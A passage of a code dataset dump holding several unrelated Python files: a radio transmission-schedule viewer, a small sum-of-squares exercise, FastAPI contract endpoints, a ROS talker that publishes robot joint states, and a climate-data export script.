score_link_with_relay(rans_list, d, tmnsradio_list, initial_link, epoch_ms):\n for ran in rans_list:\n\n epoch_us = int(int(epoch_ms) * 1000)\n relay_path = [initial_link]\n initial_dest = initial_link.dst_id\n target_dest = int(d['Link']['LinkDst'])\n relay_path = find_next_step_in_relay(ran, initial_dest, target_dest, tmnsradio_list, relay_path)\n relay_throughput_scores = []\n max_throughput_est_scores = []\n\n if relay_path:\n if \"Latency\" in d:\n if \"max_thd\" in d['Latency']:\n lat_max_thd = d['Latency']['max_thd']\n if \"min_thd\" in d['Latency']:\n lat_min_thd = d['Latency']['min_thd']\n else:\n if debug >= 1:\n print(\"The key 'Latency' was not found in the dictionary for the specified link.\")\n if \"Bandwidth\" in d:\n if \"min_thd\" in d['Bandwidth']:\n bw_min_thd = d['Bandwidth']['min_thd']\n if \"max_thd\" in d['Bandwidth']:\n bw_max_thd = d['Bandwidth']['max_thd']\n if \"coef\" in d['Bandwidth']:\n bw_coef = d['Bandwidth']['coef']\n else:\n if debug >= 1:\n print(\"The key 'Bandwidth' was not found in the dictionary for the specified link.\")\n if \"Multiplier\" in d:\n mult = d[\"Multiplier\"]\n else:\n if debug >= 1:\n print(\n \"The key 'Multiplier' was not found in the dictionary for the specified link.\")\n\n latency = calculate_latency_relay(relay_path, epoch_us)\n for link in relay_path:\n link.max_latency_usec = latency\n link.calc_throughput_value(bw_min_thd, bw_max_thd, bw_coef, mult)\n link.calc_latency_value(lat_max_thd, lat_min_thd, mult)\n max_requested_schedule(rans_list, ld_link_scores, mult)\n relay_throughput_scores.append(link.throughput_point_value)\n max_throughput_est_scores.append(link.greedy_throughput_point_value)\n\n minimum_score = min(relay_throughput_scores)\n min_max_estimate = min(max_throughput_est_scores)\n\n for link in relay_path:\n link.throughput_point_value = minimum_score\n link.greedy_throughput_point_value = min_max_estimate\n\n\ndef score_link_with_no_relay(rans_list, l, d):\n \"\"\"If Scoring Source and destination are on the same link.\"\"\"\n lat_min_thd = 0\n lat_max_thd = 0\n bw_min_thd = 0\n bw_max_thd = 0\n bw_coef = 0\n mult = 1\n if \"Latency\" in d:\n if \"max_thd\" in d['Latency']:\n lat_max_thd = d['Latency']['max_thd']\n if \"min_thd\" in d['Latency']:\n lat_min_thd = d['Latency']['min_thd']\n else:\n if debug >= 1:\n print(\"The key 'Latency' was not found in the dictionary for the specified link.\")\n if \"Bandwidth\" in d:\n if \"min_thd\" in d['Bandwidth']:\n bw_min_thd = d['Bandwidth']['min_thd']\n if \"max_thd\" in d['Bandwidth']:\n bw_max_thd = d['Bandwidth']['max_thd']\n if \"coef\" in d['Bandwidth']:\n bw_coef = d['Bandwidth']['coef']\n else:\n if debug >= 1:\n print(\"The key 'Bandwidth' was not found in the dictionary for the specified link.\")\n if \"Multiplier\" in d:\n mult = d[\"Multiplier\"]\n else:\n if debug >= 1:\n print(\n \"The key 'Multiplier' was not found in the dictionary for the specified link.\")\n l.calc_latency_value(int(lat_max_thd), int(lat_min_thd), mult)\n l.calc_throughput_value(bw_min_thd, bw_max_thd, bw_coef, mult)\n max_requested_schedule(rans_list, ld_link_scores, mult)\n\n\ndef score_transmission_schedule(rans_list, ld_link_scores, tmnsradio_list=None):\n if ld_link_scores is not None:\n for d in ld_link_scores:\n for ran in rans_list:\n epoch = ran.epoch_ms\n for l in ran.links:\n if \"Link\" in d:\n if (int(l.src) == int(d['Link']['LinkSrc'])) and (int(l.dst) == int(d['Link']['LinkDst'])):\n score_link_with_no_relay(rans_list, l, d)\n elif int(l.src) == int(d['Link']['LinkSrc']):\n score_link_with_relay(rans_list, d, tmnsradio_list, l, epoch)\n else:\n if debug >= 1:\n print(\"No match of SRC or DST: this link is {0} --> {1}\\r\".format(l.src, l.dst))\n else:\n if debug >= 1:\n print(\"No match for key 'Link' in score file for link.\\r\")\n\n# ------------------------------------------------------------------------------\n\n\ndef run_schedule_viewer():\n global mdl_file\n global score_file\n global text_d\n global now\n global stdscr\n global ld_link_scores\n\n rans_list = []\n qos_policies_list = []\n tmnsradio_list = []\n\n\n # Parse MDL file, and create the RAN Config (assuming only a single RAN Config)\n mdl_parser = etree.XMLParser(remove_blank_text=True)\n root = etree.parse(mdl_file, mdl_parser)\n\n if debug >= 3:\n print(\"***** MDL FILE CONTENTS *****\")\n print(etree.tostring(root))\n print(\"***** END MDL FILE *****\")\n\n # Parse MDL file for Configuration Version\n root_name = root.find(\"mdl:Name\", namespaces=ns).text\n root_config_ver = root.find(\"mdl:ConfigurationVersion\", namespaces=ns).text\n\n # Parse MDL file for RAN Config Parameters\n rans = root.xpath(\"//mdl:RANConfiguration\", namespaces=ns)\n for ran in rans:\n rname = ran.find(\"mdl:Name\", namespaces=ns).text\n rid = ran.attrib['ID']\n rfreq = ran.find(\"mdl:CenterFrequencyHz\", namespaces=ns).text\n repoch = ran.find(\"mdl:EpochSize\", namespaces=ns).text\n rguard = float(ran.find(\"mdl:MaxGuardTimeSec\", namespaces=ns).text) * 1000\n if debug >= 2:\n print(\"RAN Name: {}, Frequency: {}, Epoch Size: {}ms, Guardband: {}ms\".format(rname, rfreq, repoch, rguard))\n new_ran = RanConfig(name=rname, id_attr=rid, freq=rfreq, epoch_ms=repoch, guard_ms=rguard)\n rans_list.append(new_ran)\n\n # Parse MDL file for TmNSRadio\n tmnsapp = root.xpath(\"//mdl:TmNSApp\", namespaces=ns)\n for app in tmnsapp:\n tid = app.attrib['ID']\n tname = app.find(\"mdl:Name\", namespaces=ns).text\n radio = app.find(\".//mdl:TmNSRadio\", namespaces=ns)\n if radio is not None:\n trfmacaddress = int(radio.find('.//mdl:RFMACAddress', namespaces=ns).text)\n radio_group_id = radio.find(\"mdl:JoinRadioGroupRefs/mdl:RadioGroupRef\", namespaces=ns).attrib['IDREF']\n rgs = root.xpath(\"//mdl:RadioGroup[@ID='{}']\".format(radio_group_id), namespaces=ns)\n rldst = int(rgs[0].find(\"mdl:GroupRFMACAddress\", namespaces=ns).text)\n # tlistening =int(radio.find('mdl:LinkAgent/mdl:ListeningPort', namespaces=ns).text)\n new_radio = TmNSRadio(id=tid, name=tname, rfmacaddress=trfmacaddress, listeningport=rldst, incoming_group_id=radio_group_id)\n tmnsradio_list.append(new_radio)\n\n # Parse MDL file for Radio Links and their associated Transmission Schedules\n radio_links = root.xpath(\"//mdl:RadioLink\", namespaces=ns)\n for radio_link in radio_links:\n rlname = radio_link.find(\"mdl:Name\", namespaces=ns).text\n rlid = radio_link.attrib['ID']\n rlsrc_idref = radio_link.find(\"mdl:SourceRadioRef\", namespaces=ns).attrib[\"IDREF\"]\n tmas = root.xpath(\"//mdl:TmNSApp[@ID='{}']\".format(rlsrc_idref), namespaces=ns)\n rlsrc = int(tmas[0].find(\"mdl:TmNSRadio/mdl:RFMACAddress\", namespaces=ns).text)\n rlsrc_group = tmas[0].find(\"mdl:TmNSRadio/mdl:JoinRadioGroupRefs/mdl:RadioGroupRef\", namespaces=ns).attrib[\"IDREF\"]\n ran_idref = tmas[0].find(\"mdl:TmNSRadio/mdl:RANConfigurationRef\", namespaces=ns).attrib['IDREF']\n rldst_idref = radio_link.find(\"mdl:DestinationRadioGroupRef\", namespaces=ns).attrib[\"IDREF\"]\n rgs = root.xpath(\"//mdl:RadioGroup[@ID='{}']\".format(rldst_idref), namespaces=ns)\n rldst = int(rgs[0].find(\"mdl:GroupRFMACAddress\", namespaces=ns).text)\n\n new_link = RadioLink(rlname, rlid, rlsrc, rlsrc_idref, rlsrc_group, rldst, rldst_idref)\n\n tx_sched = radio_link.find(\"mdl:TransmissionSchedule\", namespaces=ns)\n if tx_sched is not None:\n # Loop through the TxOps if they are defined for this link\n for txop in tx_sched:\n txop_freq = txop.find(\"mdl:CenterFrequencyHz\", namespaces=ns).text\n txop_start = txop.find(\"mdl:StartUSec\", namespaces=ns).text\n txop_stop = txop.find(\"mdl:StopUSec\", namespaces=ns).text\n txop_timeout = txop.find(\"mdl:TxOpTimeout\", namespaces=ns).text\n new_txop = TxOp(txop_freq, txop_start, txop_stop, txop_timeout)\n new_link.add_txop(new_txop)\n\n # Iterate through the list of RANs, and add the Link to the appropriate RAN\n for r in rans_list:\n if r.id == ran_idref:\n r.add_link(new_link)\n\n # Parse MDL file for QoS Policy Info (specifically, the max latency requirement)\n qos_policies = root.xpath(\"//mdl:QoSPolicy\", namespaces=ns)\n for qos_policy in qos_policies:\n # Find the max latency requirement for the policy\n latencies = qos_policy.findall(\".//mdl:AveragePacketDelay\", namespaces=ns)\n value_usec = 1000000.0\n for latency in latencies:\n temp_value_usec = float(latency.find(\"mdl:Value\", namespaces=ns).text)\n units = latency.find(\"mdl:BaseUnit\", namespaces=ns).text\n if units == \"Second\":\n temp_value_usec = temp_value_usec * 1000000\n if temp_value_usec < value_usec:\n value_usec = temp_value_usec\n\n qpname = qos_policy.find(\"mdl:Name\", namespaces=ns).text\n qpid = qos_policy.attrib['ID']\n qplmmc = qos_policy.find(\"mdl:LinkManagementMinCapacity/mdl:Value\", namespaces=ns).text\n qpac = qos_policy.find(\"mdl:AssuredCapacity/mdl:Value\", namespaces=ns).text\n qplmax = int(value_usec)\n new_qp = QoSPolicy(qpname, qpid, qplmmc, qpac, qplmax)\n qos_policies_list.append(new_qp)\n\n rlrefs = qos_policy.findall(\".//mdl:RadioLinkRef\", namespaces=ns)\n for rlref in rlrefs:\n for r in rans_list:\n for l in r.links:\n if l.id == rlref.attrib[\"IDREF\"]:\n l.qos_policy = qos_policies_list[-1]\n\n # Calculate Schedule Efficiency per RAN\n for r in rans_list:\n total_ran_tx_time_usec = 0\n ran_epoch_usec = int(r.epoch_ms) * 1000\n for l in r.links:\n for t in l.tx_sched:\n total_ran_tx_time_usec += t.duration_usec\n l.calc_max_latency(ran_epoch_usec) # Calculate Minimum Latency Requirement Achievable per link\n l.calc_alloc_bw_mbps(r.epoch_ms) # Calculate and set the Allocated Bandwidth per link\n\n r.efficiency_pct = (total_ran_tx_time_usec / ran_epoch_usec) * 100 # Calculate Schedule Efficiency per RAN\n r.check_guardbands() # Check for any guardband violations\n\n # Load JSON scoring file\n ld_link_scores = None\n if score_file is not None:\n try:\n with open(score_file) as f:\n ld_link_scores = json.load(f)\n except FileNotFoundError:\n if debug >= 1:\n print(\"JSON Score File Not Found!\\r\")\n # score_transmission_schedule(rans_list, ld_link_scores)\n\n score_transmission_schedule(rans_list, ld_link_scores, tmnsradio_list)\n\n write_report_to_json(rans_list)\n\n return rans_list, root_name, root_config_ver\n\n\n# ------------------------------------------------------------------------------\n\n\ndef main(stdscr): \n global mdl_file\n global text_d\n global now\n\n init_text_colors()\n\n stdscr.bkgd(text_d['BG'])\n banner_pad.bkgd(text_d['BG'])\n toolbar_pad.bkgd(text_d['BG'])\n file_info_pad.bkgd(text_d['BG'])\n ran_pad.bkgd(text_d['BG'])\n link_info_pad.bkgd(text_d['BG'])\n epoch_pad.bkgd(text_d['BG'])\n txop_display_pad.bkgd(text_d['BG'])\n stdscr.clear()\n stdscr.refresh()\n\n rans_list, root_name, root_config_ver = run_schedule_viewer()\n\n # Initialize print loop variables\n num_rans = len(rans_list)\n ran_idx = 1\n\n # Begin print loop; Loop until user quits application\n while True:\n height, width = stdscr.getmaxyx()\n\n stdscr.clear()\n stdscr.refresh()\n\n # Sanity check for window height requirements\n if height < 10:\n print_too_short(width)\n elif width < 50:\n print_too_skinny(width)\n else:\n print_banner()\n print_file_info(mdl_file, root_name, root_config_ver, score_file)\n if num_rans > 0:\n print_ran_stats(rans_list[ran_idx-1])\n if len(rans_list[ran_idx-1].links) > 0:\n print_links_info(rans_list[ran_idx-1].links, num_rans)\n print_txops_in_all_rans(rans_list, (ran_idx-1))\n print_toolbar()\n stdscr.refresh()\n\n keypress = stdscr.getkey() # Wait for user to press a key\n if keypress.isdigit():\n ran_idx = int(keypress)\n elif keypress == 'q':\n break\n\n if ran_idx == 0:\n ran_idx = 1\n if ran_idx > len(rans_list):\n ran_idx = len(rans_list)\n\n# ------------------------------------------------------------------------------\n\n\ndef no_gui():\n return 0\n\n\nif __name__ == \"__main__\":\n now = time.strftime(\"%Y%m%d_%H%M%S\")\n # Argument Parser Declarations\n parser = argparse.ArgumentParser()\n parser.add_argument('FILE', action='store', default=sys.stdin, help='MDL file to examine', type=str)\n parser.add_argument('-s', action='store', default=None, dest='SCORE',\n help='JSON file to score MDL file performance', type=str)\n parser.add_argument('-d', action='store', default=0, dest='debug', help='Set the Debug level', type=int)\n parser.add_argument('-v', '--version', action='version', version='%(prog)s 0.4.1')\n parser.add_argument('-H', action='store_true', dest='HEADLESS', help='Runs Schedule Viewer in headless mode. Useful generating score.')\n parser.add_argument('--database', action='store', default=None, dest='DATABASE', help='Set Name of OrientDB database. If set the MDL file will be exported from the OrientDB database', type=str)\n parser.add_argument('--config', action='store', default=None, dest='CONFIG', help='Set config.json for OrientDB', type=str)\n cli_args = parser.parse_args()\n\n # CLI argument assignments\n\n mdl_file = cli_args.FILE\n score_file = cli_args.SCORE\n headless = cli_args.HEADLESS\n mod_name = None\n debug = cli_args.debug\n if cli_args.DATABASE is not None or cli_args.CONFIG is not None:\n from brass_api.translator.orientdb_exporter import OrientDBXMLExporter as MDLExporter\n database = cli_args.DATABASE\n configFile = cli_args.CONFIG\n exporter = MDLExporter(database, mdl_file, configFile)\n exporter.export_xml()\n if headless:\n run_schedule_viewer()\n if not headless:\n text_d = {}\n border_d = {}\n\n stdscr = curses.initscr()\n banner_pad = curses.newpad(4, 106) # Initialize Banner Pad\n toolbar_pad = curses.newpad(3, 106) # Initialize Toolbar Pad\n file_info_pad = curses.newpad(6, 102) # Initialize File Info Pad\n ran_pad = curses.newpad(5, 102) # Initialize RAN Pad\n link_info_pad = curses.newpad(8, 102) # Initialize Link Info Pad\n epoch_pad = curses.newpad(10, 102) # Initialize Epoch Pad\n txop_display_pad = curses.newpad(1, 100) # Initialize TxOp Display Pad\n\n if os.name == 'nt': # If running on Windows, disable the \"blinking\" feature of curses\n BLINK = 0 # because it doesn't look very good. Also disabling the \"bold\" feature\n BOLD = 0 # because it changes the color on Windows\n else:\n BLINK = curses.A_BLINK\n BOLD = curses.A_BOLD\n wrapper(main)\n","sub_path":"Scenarios/FlightTesting/Utilities/TxOpScheduleViewer/TxOpSchedViewer.py","file_name":"TxOpSchedViewer.py","file_ext":"py","file_size_in_byte":53908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"323325138","text":"#PF-Prac-32\r\n#import math\r\ndef check_squares(number):\r\n #start writing your code here\r\n limit=int(number**0.5)+1\r\n print(limit)\r\n for i in range(1,limit):\r\n for j in range(1,limit):\r\n res=(i**2)+(j**2)\r\n if(res==number):\r\n return True\r\n return False\r\nnumber=13\r\nprint(check_squares(number))\r\n#rayanfer32\r\n","sub_path":"check_squares.py","file_name":"check_squares.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"305022086","text":"from datetime import datetime, date\nfrom dateutil.relativedelta import relativedelta\nimport holidays\nimport pandas\nimport json\nimport math\n\nfrom typing import Any, List, Optional, Dict\n\nfrom fastapi import APIRouter, Depends, HTTPException, Query, Request, Response\nfrom sqlalchemy.orm import Session\n\nfrom app import crud, models, schemas\nfrom app.api import deps\n\nrouter = APIRouter()\n\n\n@router.get(\"/\", response_model=List[schemas.Contract])\ndef read_contracts(\n db: Session = Depends(deps.get_db),\n skip: int = 0,\n limit: int = 100,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Retrieve contracts.\n \"\"\"\n if crud.user.is_superuser(current_user):\n contracts = crud.contract.get_multi(db, skip=skip, limit=limit)\n else:\n contracts = crud.contract.get_multi_by_user(\n db=db, user_id=current_user.id, skip=skip, limit=limit\n )\n # for contract in contracts:\n # tmp = json.loads(contract[\"weekdays\"])\n # contract[\"weekdays\"] = tmp\n return contracts\n\n\n@router.post(\"/\", response_model=schemas.Contract)\ndef create_contract(\n *,\n db: Session = Depends(deps.get_db),\n contract_in: schemas.ContractCreate,\n current_user: models.User = Depends(deps.get_current_active_user),\n user_id: str,\n) -> Any:\n \"\"\"\n Create new contract.\n \"\"\"\n if (int(current_user.id) == int(user_id)) or bool(current_user.is_superuser):\n if crud.user.get(db, id=user_id) or crud.user.get(db, id=user_id):\n pass\n else:\n raise HTTPException(status_code=400, detail=\"User not found\")\n else:\n raise HTTPException(status_code=400, detail=\"User not responsible\")\n contract = crud.contract.create_with_owner(\n db=db, obj_in=contract_in, user_id=user_id)\n return contract\n\n\n@router.put(\"/{id}\", response_model=schemas.Contract)\ndef update_contract(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n contract_in: schemas.ContractUpdate,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Update an contract.\n \"\"\"\n contract = crud.contract.get(db=db, id=id)\n if not contract:\n raise HTTPException(status_code=404, detail=\"Contract not found\")\n if (not crud.user.is_superuser(current_user) and\n (contract.user_id != current_user.id)):\n raise HTTPException(status_code=400, detail=\"Not enough permissions\")\n contract = crud.contract.update(db=db, db_obj=contract, obj_in=contract_in)\n return contract\n\n\n@router.get(\"/{id}\", response_model=schemas.Contract)\ndef read_contract(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Get contract by ID.\n \"\"\"\n contract = crud.contract.get(db=db, id=id)\n if not contract:\n raise HTTPException(status_code=404, detail=\"Contract not found\")\n if (not crud.user.is_superuser(current_user) and\n (contract.user_id != current_user.id)):\n raise HTTPException(status_code=400, detail=\"Not enough permissions\")\n return contract\n\n\n@router.delete(\"/{id}\", response_model=schemas.ContractDelete)\ndef delete_contract(\n *,\n db: Session = Depends(deps.get_db),\n id: int,\n current_user: models.User = Depends(deps.get_current_active_user),\n) -> Any:\n \"\"\"\n Delete an contract.\n \"\"\"\n contract = crud.contract.get(db=db, id=id)\n if not contract:\n raise HTTPException(status_code=404, detail=\"Contract not found\")\n if (not crud.user.is_superuser(current_user) and\n (contract.user_id != current_user.id)):\n raise HTTPException(status_code=400, detail=\"Not enough permissions\")\n contract = crud.contract.remove(db=db, id=id)\n return contract\n","sub_path":"app/api/api_v1/endpoints/contracts.py","file_name":"contracts.py","file_ext":"py","file_size_in_byte":3821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"118273685","text":"#!/usr/bin/env python\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2008, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Willow Garage, Inc. nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# Revision $Id\n\n## Simple talker demo that published std_msgs/Strings messages\n## to the 'chatter' topic\n\nfrom casadi import *\nimport rospy\nimport roslib; roslib.load_manifest('visualization_marker_tutorials')\nfrom sensor_msgs.msg import JointState\nfrom std_msgs.msg import Header\nfrom visualization_msgs.msg import Marker\nfrom visualization_msgs.msg import MarkerArray\nimport mpc_fatigue.pynocchio_casadi as pin\nimport numpy as np\nimport math\n\n\n\n\ndef talker(q1,q2,F,box):\n\n #Load URDF\n pilz_first_urdf = rospy.get_param('/robot_description_1')\n pilz_second_urdf = rospy.get_param('/robot_description_2')\n\n # ---------------------- Solve forward kinematics pilz 1 ---------------------\n #Postion of link 5 in cartesian space (Solution to direct kinematics)\n fk_first_string = pin.generate_forward_kin(pilz_first_urdf, 'prbt_link_5')\n #Create casadi function\n fk_first = casadi.Function.deserialize(fk_first_string)\n\n # ---------------------- Solve forward kinematics pilz 2 ---------------------\n #Postion of link 5 in cartesian space (Solution to direct kinematics)\n fk_second_string = pin.generate_forward_kin(pilz_second_urdf, 'prbt_link_5')\n #Create casadi function\n fk_second = casadi.Function.deserialize(fk_second_string)\n\n #Define the talker parameters\n if True: \n pub = rospy.Publisher('topic_position_from_invkin', JointState, queue_size=100) # This can be seen in rostopic list\n rospy.init_node('node_position_from_invkin') #This can be seen in rosnode list\n hello_str = JointState()\n hello_str.header = Header()\n hello_str.header.stamp = rospy.Time.now()\n hello_str.name = ['prbt_joint_1','prbt_joint_2','prbt_joint_3','prbt_joint_4','prbt_joint_5','prbt_joint_6','sec_prbt_joint_1','sec_prbt_joint_2','sec_prbt_joint_3','sec_prbt_joint_4','sec_prbt_joint_5','sec_prbt_joint_6']\n hello_str.position = []\n hello_str.velocity = []\n hello_str.effort = []\n rate = rospy.Rate(10) # 10hz\n i = 0\n qsize = np.size(q1[0])\n fsize = np.size(F[0])\n\n #Define the marker plotter\n if True:\n \n topic = 'visualization_marker_array'\n publisher_1 = rospy.Publisher(topic, MarkerArray,queue_size=100)\n publisher_2 = rospy.Publisher(topic, MarkerArray,queue_size=100)\n publisher_3 = rospy.Publisher(topic, MarkerArray,queue_size=100)\n #rospy.init_node('register')\n markerArray = MarkerArray()\n \n marker_f = Marker()\n marker_s = Marker()\n weight = Marker()\n marker_f.header.frame_id = \"/prbt_base\"\n marker_s.header.frame_id = \"/prbt_base\"\n weight.header.frame_id = \"/prbt_base\"\n marker_f.ns = \"Fz_forces\";\n marker_s.ns = \"Fz_forces\";\n weight.ns = \"Fz_forces\";\n marker_f.type = marker_f.ARROW\n marker_s.type = marker_s.ARROW\n weight.type = marker_s.ARROW\n marker_f.action = marker_f.ADD\n marker_s.action = marker_s.ADD\n weight.action = weight.ADD\n marker_f.id = 0;\n marker_s.id = 1;\n weight.id = 2;\n #Scales\n marker_f.scale.x = 0.2\n marker_s.scale.x = 0.2\n weight.scale.x = 0.2\n\n marker_f.scale.y = 0.02\n marker_s.scale.y = 0.02\n weight.scale.y = 0.02\n\n marker_f.scale.z = 0.02\n marker_s.scale.z = 0.02\n weight.scale.z = 0.02\n\n marker_f.color.a = 1.0\n marker_f.color.r = 1.0\n marker_f.color.g = 1.0\n marker_f.color.b = 1.0\n\n marker_s.color.a = 1.0\n marker_s.color.r = 1.0\n marker_s.color.g = 1.0\n marker_s.color.b = 1.0\n\n weight.color.a = 1.0\n weight.color.r = 1.0\n weight.color.g = 1.0\n weight.color.b = 1.0\n\n\n marker_f.pose.orientation.x = 0.0\n marker_f.pose.orientation.y = 1.0\n marker_f.pose.orientation.z = 0.0\n marker_f.pose.orientation.w = -1.0\n\n marker_s.pose.orientation.x = 0.0\n marker_s.pose.orientation.y = 1.0\n marker_s.pose.orientation.z = 0.0\n marker_s.pose.orientation.w = -1.0\n\n weight.pose.orientation.x = 0.0\n weight.pose.orientation.y = 1.0\n weight.pose.orientation.z = 0.0\n weight.pose.orientation.w = 1.0\n\n while not rospy.is_shutdown():\n if i < qsize:\n\n if i < fsize:\n qf = [q1[0][i],q1[1][i],q1[2][i],q1[3][i],q1[4][i],q1[5][i]]\n qs = [q2[0][i],q2[1][i],q2[2][i],q2[3][i],q2[4][i],q2[5][i]]\n pos_Fzf = fk_first(q = qf)['ee_pos']\n pos_Fzs = fk_second(q = qs)['ee_pos']\n #Marker scales\n marker_f.scale.x = 0.2*F[0][i]/F[2]\n marker_s.scale.x = 0.2*F[1][i]/F[2]\n weight.scale.x = 0.2*(F[1][i] + F[0][i]) /F[2]\n\n # Marker f position \n marker_f.pose.position.x = pos_Fzf[0]+0.1\n marker_f.pose.position.y = pos_Fzf[1]\n marker_f.pose.position.z = pos_Fzf[2]\n\n marker_s.pose.position.x = pos_Fzs[0]-0.1\n marker_s.pose.position.y = pos_Fzs[1]\n marker_s.pose.position.z = pos_Fzs[2]\n\n weight.pose.position.x = box[0][i]\n weight.pose.position.y = box[1][i]\n weight.pose.position.z = box[2][i]\n\n\n pub.publish(hello_str)\n publisher_1.publish([marker_f])\n publisher_2.publish([marker_s])\n publisher_3.publish([weight])\n rate.sleep()\n hello_str.header.stamp = rospy.Time.now()\n hello_str.position = [q1[0][i],q1[1][i],q1[2][i],q1[3][i],q1[4][i],q1[5][i],q2[0][i],q2[1][i],q2[2][i],q2[3][i],q2[4][i],q2[5][i]] \n \n else:\n marker_f.action = marker_f.DELETE\n marker_s.action = marker_s.DELETE\n weight.action = weight.DELETE\n publisher_1.publish([marker_f])\n publisher_2.publish([marker_s])\n publisher_3.publish([weight])\n break\n i += 1\n \n\nif __name__ == '__main__':\n try:\n talker()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"talkers/2_pilz_6_DOF/two_pilz_talker_inv_dyn_6DOF.py","file_name":"two_pilz_talker_inv_dyn_6DOF.py","file_ext":"py","file_size_in_byte":7804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"480480747","text":"from pathlib import Path\n\nimport sys\nsys.path.append('..')\nfrom src.exporters import (ERA5Exporter, VHIExporter,\n CHIRPSExporter, ERA5ExporterPOS,\n GLEAMExporter, ESACCIExporter,\n S5Exporter, SRTMExporter, KenyaAdminExporter)\n\n\ndef export_era5():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = ERA5Exporter(data_path)\n\n # The ERA5 exporter downloads the data with wierd names.\n # A mapping of actual variables to the downloaded variable\n # names is recorded here\n name2var = {\n 'precip': 'precip',\n 'evaporation': 'e',\n 'mean_eastward_turbulent_surface_stress': 'metss',\n 'mean_northward_turbulent_surface_stress': 'mntss',\n 'potential_evaporation': 'pev',\n 'slhf': 'surface_latent_heat_flux',\n 'sp': 'surface_pressure',\n 'sshf': 'surface_sensible_heat_flux',\n 'ssrc': 'surface_net_solar_radiation_clear_sky',\n 'stl1': 'soil_temperature_level_1',\n 'strc': 'surface_net_thermal_radiation_clear_sky',\n 'swvl1': 'volumetric_soil_water_layer_1',\n 'swvl2': 'volumetric_soil_water_layer_2',\n 'swvl3': 'volumetric_soil_water_layer_3',\n 'swvl4': 'volumetric_soil_water_layer_4',\n 't2m': '2m_temperature',\n 'u10': '10m_u_component_of_wind',\n 'v10': '10m_v_component_of_wind',\n 'p84.162': 'vertical_integral_of_divergence_of_moisture_flux',\n 'VCI': 'VCI'\n }\n\n era5_variables = [\n '10m_u_component_of_wind', '10m_v_component_of_wind', 'volumetric_soil_water_layer_1',\n 'volumetric_soil_water_layer_2', 'volumetric_soil_water_layer_3',\n 'volumetric_soil_water_layer_4', 'surface_pressure', 'surface_sensible_heat_flux',\n 'surface_latent_heat_flux', 'soil_temperature_level_1', '2m_temperature',\n 'mean_eastward_turbulent_surface_stress', 'mean_northward_turbulent_surface_stress',\n 'surface_net_solar_radiation_clear_sky', 'surface_net_thermal_radiation_clear_sky',\n 'vertical_integral_of_divergence_of_moisture_flux', 'potential_evaporation',\n 'evaporation'\n ]\n\n for variable in era5_variables:\n exporter.export(variable=variable, granularity='monthly')\n\n\ndef export_vhi():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = VHIExporter(data_path)\n\n exporter.export()\n\n\ndef export_chirps():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = CHIRPSExporter(data_path)\n\n exporter.export(years=None, region='global', period='monthly')\n\n\ndef export_era5POS():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n exporter = ERA5ExporterPOS(data_path)\n\n exporter.export(variable='precipitation_amount_1hour_Accumulation')\n\n\ndef export_gleam():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = GLEAMExporter(data_folder=data_path)\n exporter.export(['E', 'SMroot', 'SMsurf'], 'monthly')\n\n\ndef export_srtm():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] == 'ml_drought':\n data_path = Path('data')\n else:\n data_path = Path('../data')\n\n exporter = SRTMExporter(data_folder=data_path)\n exporter.export()\n\n\ndef export_esa():\n # if the working directory is alread ml_drought don't need ../data\n if Path('.').absolute().as_posix().split('/')[-1] 